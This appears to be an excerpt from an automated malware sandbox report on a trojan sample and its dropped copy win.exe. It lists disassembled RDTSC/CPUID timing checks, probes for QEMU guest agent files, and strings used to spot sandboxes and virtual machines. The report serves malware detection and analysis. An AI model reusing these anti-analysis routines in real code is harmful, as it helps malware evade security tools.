            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B7FD6 second address: 00000000020B7FD6 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B47AA second address: 00000000020B7C84 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a push edi 0x0000000b mov edi, dword ptr [ebp+000001F8h] 0x00000011 test ebx, ecx 0x00000013 push 65F1F4E5h 0x00000018 xor dword ptr [esp], 68B63E62h 0x0000001f cmp cx, 6718h 0x00000024 xor dword ptr [esp], 63E23595h 0x0000002b test bx, bx 0x0000002e test ch, ch 0x00000030 add dword ptr [esp], 915A00F2h 0x00000037 mov dword ptr [ebp+000001C3h], ecx 0x0000003d mov ecx, 14B06061h 0x00000042 xor ecx, 8D1AA2EFh 0x00000048 jmp 00007F430C37BB16h 0x0000004a test dh, dh 0x0000004c xor ecx, EA202822h 0x00000052 add ecx, 8C751554h 0x00000058 cmp ebx, edx 0x0000005a push ecx 0x0000005b cmp dh, ch 0x0000005d mov ecx, dword ptr [ebp+000001C3h] 0x00000063 sub edi, 00000400h 0x00000069 mov dword ptr [ebp+00000205h], esi 0x0000006f mov esi, edi 0x00000071 cmp edx, edx 0x00000073 push esi 0x00000074 mov esi, dword ptr [ebp+00000205h] 0x0000007a test bl, bl 0x0000007c mov dword ptr [ebp+00000256h], eax 0x00000082 cmp dh, ah 0x00000084 mov eax, edi 0x00000086 push eax 0x00000087 jmp 00007F430C37BB12h 0x00000089 cmp bh, ch 0x0000008b mov eax, dword ptr [ebp+00000256h] 0x00000091 push dword ptr [ebp+4Ch] 0x00000094 call 00007F430C37EF0Eh 0x00000099 cmp cx, 5DDDh 0x0000009e mov eax, dword ptr fs:[00000030h] 0x000000a4 mov eax, dword ptr [eax+10h] 0x000000a7 pushad 0x000000a8 mov eax, 000000AFh 0x000000ad rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B5549 second address: 00000000020B5549 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B53C5 second address: 00000000020B53C5 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B57E9 second address: 00000000020B57E9 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000005632A1 second address: 00000000005632A1 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 0000000000563399 second address: 0000000000563399 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B9ACC second address: 00000000020B9AFE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c add eax, 00003004h 0x00000011 mov dword ptr [edi+00003000h], eax 0x00000017 mov ecx, A45185BAh 0x0000001c jmp 00007F430C8016E2h 0x0000001e pushad 0x0000001f lfence 0x00000022 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A9ACC second address: 00000000007A9AFE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c add eax, 00003004h 0x00000011 mov dword ptr [edi+00003000h], eax 0x00000017 mov ecx, A45185BAh 0x0000001c jmp 00007F430C8016E2h 0x0000001e pushad 0x0000001f lfence 0x00000022 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A900A second address: 00000000007A9059 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx-05h], FFFFFF9Ch 0x0000000e xor byte ptr [ebx-05h], FFFFFFA9h 0x00000012 jmp 00007F430C37BB16h 0x00000014 test bh, ch 0x00000016 cmp dh, ah 0x00000018 add byte ptr [ebx-05h], FFFFFFB0h 0x0000001c xor byte ptr [ebx-05h], 0000005Dh 0x00000020 inc eax 0x00000021 mov dword ptr [ebp+000001D4h], esi 0x00000027 mov esi, ecx 0x00000029 cmp ah, ah 0x0000002b push esi 0x0000002c test ch, ah 0x0000002e mov esi, dword ptr [ebp+000001D4h] 0x00000034 cmp dl, al 0x00000036 test dh, bh 0x00000038 xor ecx, ecx 0x0000003a pushad 0x0000003b rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B900A second address: 00000000020B9059 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx-05h], FFFFFF9Ch 0x0000000e xor byte ptr [ebx-05h], FFFFFFA9h 0x00000012 jmp 00007F430C8016E6h 0x00000014 test bh, ch 0x00000016 cmp dh, ah 0x00000018 add byte ptr [ebx-05h], FFFFFFB0h 0x0000001c xor byte ptr [ebx-05h], 0000005Dh 0x00000020 inc eax 0x00000021 mov dword ptr [ebp+000001D4h], esi 0x00000027 mov esi, ecx 0x00000029 cmp ah, ah 0x0000002b push esi 0x0000002c test ch, ah 0x0000002e mov esi, dword ptr [ebp+000001D4h] 0x00000034 cmp dl, al 0x00000036 test dh, bh 0x00000038 xor ecx, ecx 0x0000003a pushad 0x0000003b rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A9059 second address: 00000000007A9059 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B9059 second address: 00000000020B9059 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A9138 second address: 00000000007A9138 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B9138 second address: 00000000020B9138 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A5970 second address: 00000000007A5970 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B5970 second address: 00000000020B5970 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A7FD6 second address: 00000000007A7FD6 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B7FD6 second address: 00000000020B7FD6 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A47AA second address: 00000000007A7C84 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a push edi 0x0000000b mov edi, dword ptr [ebp+000001F8h] 0x00000011 test ebx, ecx 0x00000013 push 65F1F4E5h 0x00000018 xor dword ptr [esp], 68B63E62h 0x0000001f cmp cx, 6718h 0x00000024 xor dword ptr [esp], 63E23595h 0x0000002b test bx, bx 0x0000002e test ch, ch 0x00000030 add dword ptr [esp], 915A00F2h 0x00000037 mov dword ptr [ebp+000001C3h], ecx 0x0000003d mov ecx, 14B06061h 0x00000042 xor ecx, 8D1AA2EFh 0x00000048 jmp 00007F430C37BB16h 0x0000004a test dh, dh 0x0000004c xor ecx, EA202822h 0x00000052 add ecx, 8C751554h 0x00000058 cmp ebx, edx 0x0000005a push ecx 0x0000005b cmp dh, ch 0x0000005d mov ecx, dword ptr [ebp+000001C3h] 0x00000063 sub edi, 00000400h 0x00000069 mov dword ptr [ebp+00000205h], esi 0x0000006f mov esi, edi 0x00000071 cmp edx, edx 0x00000073 push esi 0x00000074 mov esi, dword ptr [ebp+00000205h] 0x0000007a test bl, bl 0x0000007c mov dword ptr [ebp+00000256h], eax 0x00000082 cmp dh, ah 0x00000084 mov eax, edi 0x00000086 push eax 0x00000087 jmp 00007F430C37BB12h 0x00000089 cmp bh, ch 0x0000008b mov eax, dword ptr [ebp+00000256h] 0x00000091 push dword ptr [ebp+4Ch] 0x00000094 call 00007F430C37EF0Eh 0x00000099 cmp cx, 5DDDh 0x0000009e mov eax, dword ptr fs:[00000030h] 0x000000a4 mov eax, dword ptr [eax+10h] 0x000000a7 pushad 0x000000a8 mov eax, 000000AFh 0x000000ad rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B47AA second address: 00000000020B7C84 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a push edi 0x0000000b mov edi, dword ptr [ebp+000001F8h] 0x00000011 test ebx, ecx 0x00000013 push 65F1F4E5h 0x00000018 xor dword ptr [esp], 68B63E62h 0x0000001f cmp cx, 6718h 0x00000024 xor dword ptr [esp], 63E23595h 0x0000002b test bx, bx 0x0000002e test ch, ch 0x00000030 add dword ptr [esp], 915A00F2h 0x00000037 mov dword ptr [ebp+000001C3h], ecx 0x0000003d mov ecx, 14B06061h 0x00000042 xor ecx, 8D1AA2EFh 0x00000048 jmp 00007F430C8016E6h 0x0000004a test dh, dh 0x0000004c xor ecx, EA202822h 0x00000052 add ecx, 8C751554h 0x00000058 cmp ebx, edx 0x0000005a push ecx 0x0000005b cmp dh, ch 0x0000005d mov ecx, dword ptr [ebp+000001C3h] 0x00000063 sub edi, 00000400h 0x00000069 mov dword ptr [ebp+00000205h], esi 0x0000006f mov esi, edi 0x00000071 cmp edx, edx 0x00000073 push esi 0x00000074 mov esi, dword ptr [ebp+00000205h] 0x0000007a test bl, bl 0x0000007c mov dword ptr [ebp+00000256h], eax 0x00000082 cmp dh, ah 0x00000084 mov eax, edi 0x00000086 push eax 0x00000087 jmp 00007F430C8016E2h 0x00000089 cmp bh, ch 0x0000008b mov eax, dword ptr [ebp+00000256h] 0x00000091 push dword ptr [ebp+4Ch] 0x00000094 call 00007F430C804ADEh 0x00000099 cmp cx, 5DDDh 0x0000009e mov eax, dword ptr fs:[00000030h] 0x000000a4 mov eax, dword ptr [eax+10h] 0x000000a7 pushad 0x000000a8 mov eax, 000000AFh 0x000000ad rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A5549 second address: 00000000007A5549 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B5549 second address: 00000000020B5549 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A53C5 second address: 00000000007A53C5 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A57E9 second address: 00000000007A57E9 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B53C5 second address: 00000000020B53C5 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B57E9 second address: 00000000020B57E9 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B900A second address: 00000000020B9059 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx-05h], FFFFFF9Ch 0x0000000e xor byte ptr [ebx-05h], FFFFFFA9h 0x00000012 jmp 00007F430C37BB16h 0x00000014 test bh, ch 0x00000016 cmp dh, ah 0x00000018 add byte ptr [ebx-05h], FFFFFFB0h 0x0000001c xor byte ptr [ebx-05h], 0000005Dh 0x00000020 inc eax 0x00000021 mov dword ptr [ebp+000001D4h], esi 0x00000027 mov esi, ecx 0x00000029 cmp ah, ah 0x0000002b push esi 0x0000002c test ch, ah 0x0000002e mov esi, dword ptr [ebp+000001D4h] 0x00000034 cmp dl, al 0x00000036 test dh, bh 0x00000038 xor ecx, ecx 0x0000003a pushad 0x0000003b rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000005632A1 second address: 00000000005632A1 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000000563399 second address: 0000000000563399 instructions:
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: win.exe, 00000016.00000002.670753706.0000000002270000.00000004.00000001.sdmp, win.exe, 00000017.00000002.846427642.00000000006B0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000000.00000002.384206851.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000010.00000002.614919374.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000011.00000002.611067572.00000000021D0000.00000004.00000001.sdmp, win.exe, 00000012.00000002.645395276.00000000020C0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000000.00000002.384206851.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000010.00000002.614919374.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000011.00000002.611067572.00000000021D0000.00000004.00000001.sdmp, win.exe, 00000012.00000002.645395276.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000016.00000002.670753706.0000000002270000.00000004.00000001.sdmp, win.exe, 00000017.00000002.846427642.00000000006B0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B8640 second address: 00000000020B8717 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test edi, 4699953Bh 0x00000011 jmp 00007F430C37BB12h 0x00000013 cmp dx, ax 0x00000016 cmp esi, 7FFFF000h 0x0000001c je 00007F430C37C008h 0x00000022 cmp cx, bx 0x00000025 mov dword ptr [ebp+000001BBh], esi 0x0000002b mov esi, DC46126Fh 0x00000030 test ah, bh 0x00000032 add esi, 42B410DBh 0x00000038 add esi, 2F6A0FE3h 0x0000003e xor esi, 4E64332Dh 0x00000044 push esi 0x00000045 mov esi, dword ptr [ebp+000001BBh] 0x0000004b push 3F3725E0h 0x00000050 jmp 00007F430C37BB12h 0x00000052 test bl, 00000059h 0x00000055 add dword ptr [esp], E785ED73h 0x0000005c sub dword ptr [esp], F0F07B61h 0x00000063 xor dword ptr [esp], 35CC97EEh 0x0000006a mov dword ptr [ebp+000001E4h], ebx 0x00000070 cmp ah, FFFFFFC7h 0x00000073 mov ebx, edi 0x00000075 push ebx 0x00000076 mov ebx, dword ptr [ebp+000001E4h] 0x0000007c test ah, ch 0x0000007e cmp cl, dl 0x00000080 push 0C0B5FD6h 0x00000085 jmp 00007F430C37BB12h 0x00000087 test bx, 110Dh 0x0000008c xor dword ptr [esp], B8A1423Dh 0x00000093 cmp bl, cl 0x00000095 xor dword ptr [esp], 7E9EE3EAh 0x0000009c add dword ptr [esp], 35CB01FFh 0x000000a3 pushad 0x000000a4 lfence 0x000000a7 rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B9ACC second address: 00000000020B9AFE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c add eax, 00003004h 0x00000011 mov dword ptr [edi+00003000h], eax 0x00000017 mov ecx, A45185BAh 0x0000001c jmp 00007F430C37BB12h 0x0000001e pushad 0x0000001f lfence 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B900A second address: 00000000020B9059 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx-05h], FFFFFF9Ch 0x0000000e xor byte ptr [ebx-05h], FFFFFFA9h 0x00000012 jmp 00007F430C8016E6h 0x00000014 test bh, ch 0x00000016 cmp dh, ah 0x00000018 add byte ptr [ebx-05h], FFFFFFB0h 0x0000001c xor byte ptr [ebx-05h], 0000005Dh 0x00000020 inc eax 0x00000021 mov dword ptr [ebp+000001D4h], esi 0x00000027 mov esi, ecx 0x00000029 cmp ah, ah 0x0000002b push esi 0x0000002c test ch, ah 0x0000002e mov esi, dword ptr [ebp+000001D4h] 0x00000034 cmp dl, al 0x00000036 test dh, bh 0x00000038 xor ecx, ecx 0x0000003a pushad 0x0000003b rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B9059 second address: 00000000020B9059 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B9138 second address: 00000000020B9138 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B5970 second address: 00000000020B5970 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B7FD6 second address: 00000000020B7FD6 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B47AA second address: 00000000020B7C84 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a push edi 0x0000000b mov edi, dword ptr [ebp+000001F8h] 0x00000011 test ebx, ecx 0x00000013 push 65F1F4E5h 0x00000018 xor dword ptr [esp], 68B63E62h 0x0000001f cmp cx, 6718h 0x00000024 xor dword ptr [esp], 63E23595h 0x0000002b test bx, bx 0x0000002e test ch, ch 0x00000030 add dword ptr [esp], 915A00F2h 0x00000037 mov dword ptr [ebp+000001C3h], ecx 0x0000003d mov ecx, 14B06061h 0x00000042 xor ecx, 8D1AA2EFh 0x00000048 jmp 00007F430C37BB16h 0x0000004a test dh, dh 0x0000004c xor ecx, EA202822h 0x00000052 add ecx, 8C751554h 0x00000058 cmp ebx, edx 0x0000005a push ecx 0x0000005b cmp dh, ch 0x0000005d mov ecx, dword ptr [ebp+000001C3h] 0x00000063 sub edi, 00000400h 0x00000069 mov dword ptr [ebp+00000205h], esi 0x0000006f mov esi, edi 0x00000071 cmp edx, edx 0x00000073 push esi 0x00000074 mov esi, dword ptr [ebp+00000205h] 0x0000007a test bl, bl 0x0000007c mov dword ptr [ebp+00000256h], eax 0x00000082 cmp dh, ah 0x00000084 mov eax, edi 0x00000086 push eax 0x00000087 jmp 00007F430C37BB12h 0x00000089 cmp bh, ch 0x0000008b mov eax, dword ptr [ebp+00000256h] 0x00000091 push dword ptr [ebp+4Ch] 0x00000094 call 00007F430C37EF0Eh 0x00000099 cmp cx, 5DDDh 0x0000009e mov eax, dword ptr fs:[00000030h] 0x000000a4 mov eax, dword ptr [eax+10h] 0x000000a7 pushad 0x000000a8 mov eax, 000000AFh 0x000000ad rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B5549 second address: 00000000020B5549 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B4EE7 second address: 00000000020B4F57 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, E6694764h 0x00000010 xor eax, 84AE2B33h 0x00000015 xor eax, 41623A29h 0x0000001a sub eax, 23A5567Eh 0x0000001f push eax 0x00000020 mov eax, dword ptr [ebp+000001E4h] 0x00000026 push 9EE3AA3Fh 0x0000002b jmp 00007F430C37BB12h 0x0000002d test dx, dx 0x00000030 xor dword ptr [esp], F222664Ah 0x00000037 test dx, cx 0x0000003a xor dword ptr [esp], 30D813E0h 0x00000041 cmp bl, cl 0x00000043 xor dword ptr [esp], 5C19DF97h 0x0000004a test ecx, ecx 0x0000004c mov eax, ebp 0x0000004e cmp dx, dx 0x00000051 add eax, 00000100h 0x00000056 mov dword ptr [eax], C54B295Eh 0x0000005c pushad 0x0000005d lfence 0x00000060 rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B53C5 second address: 00000000020B53C5 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B57E9 second address: 00000000020B57E9 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 0000000000568640 second address: 0000000000568717 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test edi, 4699953Bh 0x00000011 jmp 00007F430C8016E2h 0x00000013 cmp dx, ax 0x00000016 cmp esi, 7FFFF000h 0x0000001c je 00007F430C801BD8h 0x00000022 cmp cx, bx 0x00000025 mov dword ptr [ebp+000001BBh], esi 0x0000002b mov esi, DC46126Fh 0x00000030 test ah, bh 0x00000032 add esi, 42B410DBh 0x00000038 add esi, 2F6A0FE3h 0x0000003e xor esi, 4E64332Dh 0x00000044 push esi 0x00000045 mov esi, dword ptr [ebp+000001BBh] 0x0000004b push 3F3725E0h 0x00000050 jmp 00007F430C8016E2h 0x00000052 test bl, 00000059h 0x00000055 add dword ptr [esp], E785ED73h 0x0000005c sub dword ptr [esp], F0F07B61h 0x00000063 xor dword ptr [esp], 35CC97EEh 0x0000006a mov dword ptr [ebp+000001E4h], ebx 0x00000070 cmp ah, FFFFFFC7h 0x00000073 mov ebx, edi 0x00000075 push ebx 0x00000076 mov ebx, dword ptr [ebp+000001E4h] 0x0000007c test ah, ch 0x0000007e cmp cl, dl 0x00000080 push 0C0B5FD6h 0x00000085 jmp 00007F430C8016E2h 0x00000087 test bx, 110Dh 0x0000008c xor dword ptr [esp], B8A1423Dh 0x00000093 cmp bl, cl 0x00000095 xor dword ptr [esp], 7E9EE3EAh 0x0000009c add dword ptr [esp], 35CB01FFh 0x000000a3 pushad 0x000000a4 lfence 0x000000a7 rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000005632A1 second address: 00000000005632A1 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 0000000000563399 second address: 0000000000563399 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 000000000056379A second address: 000000000056383C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov eax, dword ptr fs:[00000030h] 0x00000009 cmp bl, al 0x0000000b mov eax, dword ptr [eax+0Ch] 0x0000000e mov eax, dword ptr [eax+0Ch] 0x00000011 test cl, cl 0x00000013 test bl, cl 0x00000015 test edx, 7C659410h 0x0000001b mov ecx, dword ptr [edi+00000808h] 0x00000021 jmp 00007F430C37BB40h 0x00000023 mov dword ptr [eax+20h], ecx 0x00000026 mov esi, dword ptr [edi+00000800h] 0x0000002c mov dword ptr [eax+18h], esi 0x0000002f add esi, dword ptr [edi+00000850h] 0x00000035 mov dword ptr [eax+1Ch], esi 0x00000038 cmp dword ptr [ebp+70h], 01h 0x0000003c je 00007F430C37BE0Ch 0x00000042 jmp 00007F430C37BB16h 0x00000044 cmp edi, A946FD75h 0x0000004a pushad 0x0000004b mov edi, 000000E1h 0x00000050 rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 0000000000563B90 second address: 0000000000563B90 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b xor byte ptr [esi+ecx], 00000011h 0x0000000f add byte ptr [esi+ecx], FFFFFF86h 0x00000013 sub byte ptr [esi+ecx], FFFFFFF1h 0x00000017 cmp ecx, 00000000h 0x0000001a jne 00007F430C8016AAh 0x0000001c test dx, ax 0x0000001f dec ecx 0x00000020 mov byte ptr [esi+ecx], 0000007Ah 0x00000024 pushad 0x00000025 lfence 0x00000028 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B8640 second address: 00000000020B8717 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test edi, 4699953Bh 0x00000011 jmp 00007F430C37BB12h 0x00000013 cmp dx, ax 0x00000016 cmp esi, 7FFFF000h 0x0000001c je 00007F430C37C008h 0x00000022 cmp cx, bx 0x00000025 mov dword ptr [ebp+000001BBh], esi 0x0000002b mov esi, DC46126Fh 0x00000030 test ah, bh 0x00000032 add esi, 42B410DBh 0x00000038 add esi, 2F6A0FE3h 0x0000003e xor esi, 4E64332Dh 0x00000044 push esi 0x00000045 mov esi, dword ptr [ebp+000001BBh] 0x0000004b push 3F3725E0h 0x00000050 jmp 00007F430C37BB12h 0x00000052 test bl, 00000059h 0x00000055 add dword ptr [esp], E785ED73h 0x0000005c sub dword ptr [esp], F0F07B61h 0x00000063 xor dword ptr [esp], 35CC97EEh 0x0000006a mov dword ptr [ebp+000001E4h], ebx 0x00000070 cmp ah, FFFFFFC7h 0x00000073 mov ebx, edi 0x00000075 push ebx 0x00000076 mov ebx, dword ptr [ebp+000001E4h] 0x0000007c test ah, ch 0x0000007e cmp cl, dl 0x00000080 push 0C0B5FD6h 0x00000085 jmp 00007F430C37BB12h 0x00000087 test bx, 110Dh 0x0000008c xor dword ptr [esp], B8A1423Dh 0x00000093 cmp bl, cl 0x00000095 xor dword ptr [esp], 7E9EE3EAh 0x0000009c add dword ptr [esp], 35CB01FFh 0x000000a3 pushad 0x000000a4 lfence 0x000000a7 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B9ACC second address: 00000000020B9AFE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c add eax, 00003004h 0x00000011 mov dword ptr [edi+00003000h], eax 0x00000017 mov ecx, A45185BAh 0x0000001c jmp 00007F430C8016E2h 0x0000001e pushad 0x0000001f lfence 0x00000022 rdtsc
